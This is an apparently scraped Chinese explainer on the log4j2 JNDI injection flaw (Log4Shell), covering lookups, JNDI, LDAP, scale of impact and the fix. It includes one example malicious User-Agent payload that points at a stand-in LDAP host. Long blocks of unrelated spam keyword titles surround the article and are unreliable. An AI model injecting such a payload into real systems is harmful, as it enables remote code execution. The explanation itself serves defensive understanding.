国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

核彈級漏洞!我把log4j扒給你看!

安全 漏洞
我看了很多技術分析文章,都太過專業,很多非Java技術?;蛘卟桓惆踩娜酥荒芸磦€一知半解,導致大家只能看個熱鬧,對這個漏洞的成因、原理、利用方式、影響面理解的不到位。

[[439901]]

大家好,我是軒轅。

相信大家這兩天應該被這么一條新聞刷屏了:

這個漏洞到底是怎么回事?

核彈級,真的有那么厲害嗎?

怎么利用這個漏洞呢?

我看了很多技術分析文章,都太過專業,很多非Java技術棧或者不搞安全的人只能看個一知半解,導致大家只能看個熱鬧,對這個漏洞的成因、原理、利用方式、影響面理解的不到位。

這篇文章,我嘗試讓所有技術相關的朋友都能看懂:這個注定會載入網絡安全史冊上的漏洞,到底是怎么一回事!

log4j2

不管是什么編程語言,不管是前端后端還是客戶端,對打日志都不會陌生。

通過日志,可以幫助我們了解程序的運行情況,排查程序運行中出現的問題。

在Java技術棧中,用的比較多的日志輸出框架主要是log4j2和logback。

今天討論的主角就是log4j2。

我們經常會在日志中輸出一些變量,比如:

  1. logger.info("client ip: {}", clientIp) 

現在思考一個問題:

假如現在想要通過日志輸出一個Java對象,但這個對象不在程序中,而是在其他地方,比如可能在某個文件中,甚至可能在網絡上的某個地方,這種時候怎么辦呢?

log4j2的強大之處在于,除了可以輸出程序中的變量,它還提供了一個叫Lookup的東西,可以用來輸出更多內容:

lookup,顧名思義就是查找、搜索的意思,那在log4j2中,就是允許在輸出日志的時候,通過某種方式去查找要輸出的內容。

lookup相當于是一個接口,具體去哪里查找,怎么查找,就需要編寫具體的模塊去實現了,類似于面向對象編程中多態那意思。

好在,log4j2已經幫我們把常見的查找途徑都進行實現了:

具體每一個的意思,這里就不詳述了,這不是本文的重點。

JNDI

主要來看其中那個叫JNDI的東西:

JNDI即Java Naming and Directory Interface(JAVA命名和目錄接口),它提供一個目錄系統,并將服務名稱與對象關聯起來,從而使得開發人員在開發過程中可以使用名稱來訪問對象。

看不懂?看不懂就對了!

簡單粗暴理解:有一個類似于字典的數據源,你可以通過JNDI接口,傳一個name進去,就能獲取到對象了。

那不同的數據源肯定有不同的查找方式,所以JNDI也只是一個上層封裝,在它下面也支持很多種具體的數據源。

LDAP

繼續把目光聚焦,咱們只看這個叫LDAP的東西。

LDAP即Lightweight Directory Access Protocol(輕量級目錄訪問協議),目錄是一個為查詢、瀏覽和搜索而優化的專業分布式數據庫,它呈樹狀結構組織數據,就好象Linux/Unix系統中的文件目錄一樣。目錄數據庫和關系數據庫不同,它有優異的讀性能,但寫性能差,并且沒有事務處理、回滾等復雜功能,不適于存儲修改頻繁的數據。所以目錄天生是用來查詢的,就好像它的名字一樣。

看不懂?看不懂就對了!

這個東西用在統一身份認證領域比較多,但今天也不是這篇文章的重點。你只需要簡單粗暴理解:有一個類似于字典的數據源,你可以通過LDAP協議,傳一個name進去,就能獲取到數據。

漏洞原理

好了,有了以上的基礎,再來理解這個漏洞就很容易了。

假如某一個Java程序中,將瀏覽器的類型記錄到了日志中:

  1. String userAgent = request.getHeader("User-Agent"); 
  2.  
  3. logger.info(userAgent); 

網絡安全中有一個準則:不要信任用戶輸入的任何信息。

這其中,User-Agent就屬于外界輸入的信息,而不是自己程序里定義出來的。只要是外界輸入的,就有可能存在惡意的內容。

假如有人發來了一個HTTP請求,他的User-Agent是這樣一個字符串:

  1. ${jndi:ldap://127.0.0.1/exploit} 

接下來,log4j2將會對這行要輸出的字符串進行解析。

首先,它發現了字符串中有 ${},知道這個里面包裹的內容是要單獨處理的。

進一步解析,發現是JNDI擴展內容。

再進一步解析,發現了是LDAP協議,LDAP服務器在127.0.0.1,要查找的key是exploit。

最后,調用具體負責LDAP的模塊去請求對應的數據。

如果只是請求普通的數據,那也沒什么,但問題就出在還可以請求Java對象!

Java對象一般只存在于內存中,但也可以通過序列化的方式將其存儲到文件中,或者通過網絡傳輸。

如果是自己定義的序列化方式也還好,但更危險的在于:JNDI還支持一個叫命名引用(Naming References)的方式,可以通過遠程下載一個class文件,然后下載后加載起來構建對象。

PS:有時候Java對象比較大,直接通過LDAP這些存儲不方便,就整了個類似于二次跳轉的意思,不直接返回對象內容,而是告訴你對象在哪個class里,讓你去那里找。

注意,這里就是核心問題了:JNDI可以遠程下載class文件來構建對象!!!。

危險在哪里?

如果遠程下載的URL指向的是一個黑客的服務器,并且下載的class文件里面藏有惡意代碼,那不就完犢子了嗎?

還沒看懂?沒關系,我畫了一張圖:

這就是鼎鼎大名的JNDI注入攻擊!

其實除了LDAP,還有RMI的方式,有興趣的可以了解下。

JNDI 注入

其實這種攻擊手法不是這一次出現了,早在2016的blackhat大會上,就有大佬披露了這種攻擊方式。

回過頭來看,問題的核心在于:

Java允許通過JNDI遠程去下載一個class文件來加載對象,如果這個遠程地址是自己的服務器,那還好說,如果是可以被外界來指定的地址,那就要出大問題!

前面的例子中,一直用的127.0.0.1來代替LDAP服務器地址,那如果輸入的User-Agent字符串中不是這個地址,而是一個惡意服務器地址呢?

影響規模

這一次漏洞的影響面之所以如此之大,主要還是log4j2的使用面實在是太廣了。

一方面現在Java技術棧在Web、后端開發、大數據等領域應用非常廣泛,國內除了阿里巴巴、京東、美團等一大片以Java為主要技術棧的公司外,還有多如牛毛的中小企業選擇Java。

另一方面,還有好多像kafka、elasticsearch、flink這樣的大量中間件都是用Java語言開發的。

在上面這些開發過程中,大量使用了log4j2作為日志輸出。只要一個不留神,輸出的日志有外部輸入混進來,那直接就是遠程代碼執行RCE,滅頂之災!

修復

新版的log4j2已經修復了這個問題,大家趕緊升級。

下面是log4j2官網中關于JNDI lookup的說明:

我通過搜索引擎找到了緩存的12月10號前的快照,大家對比一下,比起下面這個緩存,上面那一版多了哪些東西?

答案是:修復后的log4j2在JNDI lookup中增加了很多的限制:

默認不再支持二次跳轉(也就是命名引用)的方式獲取對象

只有在log4j2.allowedLdapClasses列表中指定的class才能獲取。

只有遠程地址是本地地址或者在log4j2.allowedLdapHosts列表中指定的地址才能獲取

以上幾道限制,算是徹底封鎖了通過打印日志去遠程加載class的這條路了。

最后,手機前的各位Java小伙伴兒們,你們寫的程序中有用到log4j2嗎,有沒有某個地方的輸出,有外部的參數混進來呢?

 

趕緊檢查檢查哦!

 

責任編輯:武曉燕 來源: 編程技術宇宙
相關推薦

2021-12-13 01:49:34

漏洞Log4j代碼

2022-03-25 13:42:15

Log4j漏洞網絡安全

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2022-05-30 14:04:23

Log4j遠程代碼漏洞

2022-03-30 11:29:53

漏洞補丁Spring

2021-12-14 23:44:26

漏洞Log4j項目

2021-12-23 11:03:25

Log4j 漏洞漏洞

2022-01-24 10:02:53

漏洞微軟網絡攻擊

2021-12-24 09:52:31

Traefik Log4J 漏洞

2021-12-11 13:22:10

漏洞公司Log4j

2021-12-30 08:55:41

Log4j2FastJson漏洞

2022-01-10 11:16:40

漏洞 Log4j2Jndi

2022-01-02 07:07:55

CISAApache Log4漏洞

2022-01-06 09:52:39

Log4j漏洞攻擊

2023-11-10 10:08:23

2022-02-13 16:18:57

JetBrainsIntelliJLog4j

2022-02-15 17:51:38

Log4j漏洞網絡安全

2021-12-21 14:25:01

Log4j2漏洞網絡

2021-12-16 12:27:15

Log4j漏洞網絡安全

2021-12-22 16:53:31

Log4jLog4j庫零日漏洞
點贊
收藏

51CTO技術棧公眾號

五月精品视频| 国产精品美女999| 久久一区免费| 亚洲电影一区| 欧美三级电影在线观看| 日韩爱爱小视频| 老头吃奶性行交视频| 宅男网站在线免费观看| 91久久国产综合久久91猫猫| 国产高清不卡| 午夜欧美激情| 日韩经典一区二区| 欧美另类第一页| 极品白浆推特女神在线观看| 国产精品三级av在线播放| 中国黄色录像片| 久久国产一区二区三区| 在线观看麻豆蜜桃| 精品三级在线看| 成年人在线观看视频免费| 欧美性受xxxx黑人xyx| 久久亚洲国产精品尤物| 麻豆精品传媒视频| 午夜精品久久一牛影视| 久草免费在线色站| 久草热久草热线频97精品| 亚洲欧洲成人精品av97| 日本福利专区在线观看| 日韩视频不卡中文| 日韩精品专区| 91精品国产高清自在线看超| 99视频这里有精品| 国产成人高潮免费观看精品| 亚洲日本三级| 欧美国产综合视频| 日本强好片久久久久久aaa| 亚洲高清不卡一区| 久久人人爽爽爽人久久久| 国产精品一 二 三| 欧洲亚洲视频| 韩国欧美亚洲国产| 久热精品在线观看视频| 国产亚洲亚洲国产一二区| av亚洲精华国产精华| 六十路精品视频| 日韩欧美一级二级三级| 岛国在线视频免费看| 久久99精品国产麻豆婷婷洗澡| 欧美极品第一页| 18视频在线观看网站| 福利电影一区二区| 久精品免费视频| 北岛玲一区二区三区| 欧美激情中文字幕一区二区| 欧美精品色一区二区三区| 亚洲乱码一区二区三区| 成人资源在线| 亚洲人成人一区二区在线观看| 国产精品麻豆免费版| 免费观看久久久久| 日韩视频二区| 欧美日本在线观看| 三上悠亚久久精品| 国产99一区视频免费| 欧美激情精品久久久久久大尺度 | 中文字幕一区二区三区在线播放| 99久久久精品免费观看国产 | 欧美精品三级| 亚洲免费av电影| 在线播放 亚洲| 成人在线日韩| 日韩极品在线观看| 日韩一区二区三区xxxx| 久久av少妇| 国产精品狼人久久影院观看方式| 欧美中文在线| 国产精品丝袜白浆摸在线| 91尤物视频在线观看| 日韩毛片免费看| 在线国产一级| 9a蜜桃久久久久久免费| 欧美日韩国产大片| 99在线精品视频在线观看| 欧美大片免费看| 久久精品黄色| 在线观看久久久久久| 啦啦啦在线视频免费观看高清中文 | 免费网站看v片在线a| 久久久国产精品一区| 亚洲高清激情| 羞羞网站在线观看入口免费| 欧美性欧美巨大黑白大战| 色播一区二区| 国产一区二区视频播放| 精品视频一区二区三区免费| 天堂成人娱乐在线视频免费播放网站| 国产乱淫av片杨贵妃| 亚洲午夜激情网站| 成人污版视频| 久久久久久亚洲精品不卡4k岛国| 不卡一区二区中文字幕| 狠狠干在线视频| 精品久久久久久无码中文野结衣| 狠狠躁夜夜躁久久躁别揉| 欧美风狂大伦交xxxx| 一区二区三区加勒比av| 亚洲成人精品| 午夜小视频福利在线观看| 性高湖久久久久久久久aaaaa| 日韩少妇与小伙激情| 色婷婷综合久久久久| 亚洲三级小视频| 亚洲自拍另类| 91免费精品国偷自产在线在线| 麻豆tv在线| 中文av一区二区三区| 国产高清精品软男同| 91精品国产精品| 欧美mv日韩mv国产| 亚洲精品一卡二卡| 香港欧美日韩三级黄色一级电影网站| 中文字幕在线播放第一页| 国产免费观看久久黄| 欧美浪妇xxxx高跟鞋交| 久久大综合网| 久草在线免费福利资源| 国产亚洲欧美另类一区二区三区| 一本到高清视频免费精品| 在线成人www免费观看视频| 国产免费黄色av| 色婷婷成人综合| 亚洲色图一区二区三区| 懂色av一区二区| 精品视频在线一区二区在线| 中国一级黄色录像| 亚洲伦在线观看| 久久成人国产| 午夜久久tv| 大片网站久久| 国产精品毛片久久久| 日本欧美一级片| 欧美日韩福利| 亚洲精品午夜av福利久久蜜桃| 第四色在线一区二区| 国产精品一区二区三区av | 久久96国产精品久久99软件| 久久久精品电影| 亚洲а∨天堂久久精品喷水 | 国产精品无遮挡| 91av精品| 激情不卡一区二区三区视频在线| 欧美日韩在线免费播放| 视频一区视频二区视频三区视频四区国产| 日韩经典中文字幕| 亚洲曰韩产成在线| 国产成人自拍高清视频在线免费播放| 国产亚洲字幕| 国产成人高清精品| 在线观看黄av| 亚洲色图图片| 精品电影在线| 99re国产| 国产精品一区2区| 日本在线电影一区二区三区| 亚洲日产av中文字幕| 成人嘿咻视频免费看| 性高湖久久久久久久久| 久久99最新地址| 久久国产精品毛片| 麻豆成人久久精品二区三区小说| 国产在线麻豆精品观看| a美女胸又www黄视频久久| 国产亚洲欧美激情| 欧美三级蜜桃2在线观看| 欧美精品一区二区三区视频| 精品国产一区二区三区久久狼黑人| 久久久综合av| 91精品国产综合久久久久久蜜臀| 久久er99热精品一区二区三区| 成人免费视频91| 伊人色综合网| 手机在线理论片| 国产亚洲一卡2卡3卡4卡新区| 欧美好骚综合网| 国产精品一区二区久久精品爱涩| 日本一区二区三区久久久久久久久不| 亚洲美女免费视频| 精品91自产拍在线观看一区| 欧美高清视频免费观看| 国产高清精品一区二区三区| 精品人妻人人做人人爽| 色综合久久网女同蕾丝边| 成人看片在线观看| 综合视频在线| 国产嫩草影院久久久久| 欧美精品一区二区蜜臀亚洲| 成人精品一区二区三区电影黑人| 成人免费看片'免费看| 男女视频在线| 最新亚洲一区|